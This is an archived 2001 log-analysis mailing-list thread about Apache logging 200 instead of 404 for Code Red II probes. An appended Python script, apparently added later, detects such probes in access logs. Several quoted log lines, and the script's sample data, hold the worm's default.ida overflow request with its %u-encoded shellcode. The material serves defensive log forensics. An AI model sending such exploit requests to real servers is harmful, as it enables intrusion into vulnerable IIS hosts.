Re: [logs] 200 return code on Code Red II against Apache?

From: JW (jwat_private)
Date: Wed Sep 12 2001 - 15:28:21 PDT


    What is the question: are you wondering why any UNIX box would actually have a default.ida? Well, there are a number of packages that implement Windows functions for UNIX; for example, Sun Microsystems now owns Chili!Soft ASP, which is M$ ASP for UNIX. I believe there are similar packages for things besides ASP too.
    
    Is it possible that the servers in question have something like that installed? Apache FrontPage extensions maybe?
    
    Also, I recall some people discussing writing a dummy script that actually did something useful, like email the administrator of the client's netblock, or something, reporting the hit.
    
    At 03:57 PM 9/12/2001 -0500, you wrote:
    >Yes, I have four of them (very odd...)
    >
    >root@www:/var/log/apache# grep "default.ida" usb-access.log  | grep
    >"HTTP/1.0\" 200"
    >192.192.135.153 - - [05/Aug/2001:22:13:19 -0500] "GET
    >/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
    >HTTP/1.0" 200 -
    >211.41.178.2 - - [20/Aug/2001:05:06:41 -0500] "GET
    >/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
    >HTTP/1.0" 200 -
    >200.48.188.155 - - [22/Aug/2001:16:36:36 -0500] "GET
    >/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
    >HTTP/1.0" 200 -
    >195.117.169.40 - - [04/Sep/2001:03:51:49 -0500] "GET
    >/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
    >HTTP/1.0" 200 -
    >root@www:/var/log/apache#
    >
    >
    >Sweth Chandramouli wrote:
    >> 
    >>         This probably isn't appropriate for this list, or at
    >> least is more appropriate for other lists, but I'm tired (and about to
    >> go to sleep now that I've finally confirmed that none of my friends have
    >> been blown up or crushed by falling buildings) and figured the folks here
    >> might be likely to have seen this if anyone has.  So, has anyone seen an
    >> Apache server return a 200 rather than 404 (according to Apache's logs)
    >> in response to an attempted Code Red II exploit?  I've seen a single
    >> occurrence of it to date, on a Solaris machine that quite regularly gets
    >> such attempts; all of the log entries for those other attempts (both
    >> before and since) had the proper 404 response code, but this particular
    >> one doesn't:
    >> 
    >> ct740592-a.westprt1.ky.home.com - - [11/Sep/2001:12:21:28 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 200 - "-" "-"
    >> 
    >>         .  I've only tracked down one other example of this
    >> mentioned on the web, at
    >> <http://www.geocrawler.com/lists/3/Debian-Linux/199/25/6335051/>; Ian,
    >> who reported that incident, never figured out what caused it, either.
    >> 
    >>         Could anyone who has seen this (or has a good idea of what
    >> it is) email me off-list?
    >> 
    >>         Thanks,
    >> 
    >>         Sweth.
    >> 
    >> --
    >> Sweth Chandramouli ; <svcat_private>
    >> President, Idiopathic Systems Consulting
    >> 
    >
    >-- 
    >djenkinsat_private                           Universal Savings Bank.
    >Security Administrator, Unix Administrator, Alpha Geek
    >
    >The three most dangerous things are a programmer with a soldering
    >iron, a manager who codes, and a user who gets ideas.
    >
    >---------------------------------------------------------------------
    >To unsubscribe, e-mail: loganalysis-unsubscribeat_private
    >For additional commands, e-mail: loganalysis-helpat_private
    
    ----------------------------------------------------
    Jonathan Wilson
    System Administrator
    
    Cedar Creek Software     http://www.cedarcreeksoftware.com
    Central Texas IT     http://www.centraltexasit.com
    
    
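As an added example (not code from this thread or from any list member), here is a small Python audit of the pattern the thread is discussing: parse Apache common/combined-format access-log lines, pick out the Code Red default.ida probes, tally their status codes, and list the probes the server answered with 2xx, since on an Apache box a default.ida request should normally draw a 404 and a 200 means some handler (an ASP-emulation package, a FrontPage extension, a custom dummy script) actually accepted it. The log lines and addresses are constructed for the example (RFC 5737 documentation ranges, with the payload prefix shortened), and the X-versus-N filler test used to label the worm variant is this example's own heuristic.

```python
import re
from collections import Counter

# Constructed Apache log lines for this example (not the thread's own entries):
# three Code Red II probes, two answered 404 and one answered 200, an ordinary
# request in combined format, and one corrupt line to show the parser skipping it.
# The 200 entry keeps the doubled space before HTTP/1.0 seen in one real entry.
SAMPLE_LOG = """\
192.0.2.10 - - [05/Aug/2001:22:13:19 -0500] "GET /default.ida?XXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 -
198.51.100.7 - - [20/Aug/2001:05:06:41 -0500] "GET /index.html HTTP/1.0" 200 1234 "-" "Mozilla/4.0"
203.0.113.5 - - [22/Aug/2001:16:36:36 -0500] "GET /default.ida?XXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 200 - "-" "-"
this line is not a valid access-log entry
192.0.2.44 - - [04/Sep/2001:03:51:49 -0500] "GET /default.ida?XXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 -
"""

# The first seven fields of Apache's common and combined formats are identical,
# so this prefix match parses both (the combined referer/agent fields are ignored).
CLF_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Code Red probe: GET /default.ida with a long filler run followed by %u-encoded
# payload words. Heuristic used here: 'X' filler = Code Red II, 'N' filler = the
# earlier Code Red variants.
IDA_PROBE_RE = re.compile(r'^/default\.ida\?(?P<filler>[XN]+)%u', re.IGNORECASE)


def parse_clf(line):
    """Parse one access-log line into a dict of fields, or None if it does not parse."""
    m = CLF_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # split() rather than a fixed single-space pattern, so a doubled space
    # between the target and the protocol does not break the parse
    parts = rec['request'].split()
    rec['method'] = parts[0] if parts else ''
    rec['target'] = parts[1] if len(parts) > 1 else ''
    rec['proto'] = parts[2] if len(parts) > 2 else ''
    return rec


def classify_probe(target):
    """Return 'CodeRedII', 'CodeRed', or None for a request target."""
    m = IDA_PROBE_RE.match(target)
    if not m:
        return None
    return 'CodeRedII' if m.group('filler')[0].upper() == 'X' else 'CodeRed'


def audit(log_text):
    """Tally default.ida probes by status and list the ones the server accepted (2xx)."""
    by_status = Counter()
    by_variant = Counter()
    accepted = []
    unparsed = 0
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_clf(line)
        if rec is None:
            unparsed += 1
            continue
        variant = classify_probe(rec['target'])
        if variant is None:
            continue
        by_status[rec['status']] += 1
        by_variant[variant] += 1
        if rec['status'].startswith('2'):
            # A 2xx here means something on the box handled the request; the
            # size column tells you whether a body was actually served.
            accepted.append({'host': rec['host'], 'time': rec['time'],
                             'status': rec['status'], 'size': rec['size'],
                             'variant': variant})
    return {'probes': sum(by_status.values()), 'by_status': dict(by_status),
            'by_variant': dict(by_variant), 'accepted': accepted,
            'unparsed': unparsed}


if __name__ == '__main__':
    report = audit(SAMPLE_LOG)
    print(f"default.ida probes: {report['probes']}  by status: {report['by_status']}"
          f"  unparsed lines: {report['unparsed']}")
    for hit in report['accepted']:
        print(f"ACCEPTED ({hit['status']}) from {hit['host']} at {hit['time']}: "
              f"{hit['variant']}, size {hit['size']} -- check which handler served /default.ida")
```

Run it against a real access log by replacing SAMPLE_LOG with the file contents; for each accepted probe, the next step is to confirm in the server's configuration which handler, module or script is mapped to /default.ida (or to *.ida) and whether that is intended.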
    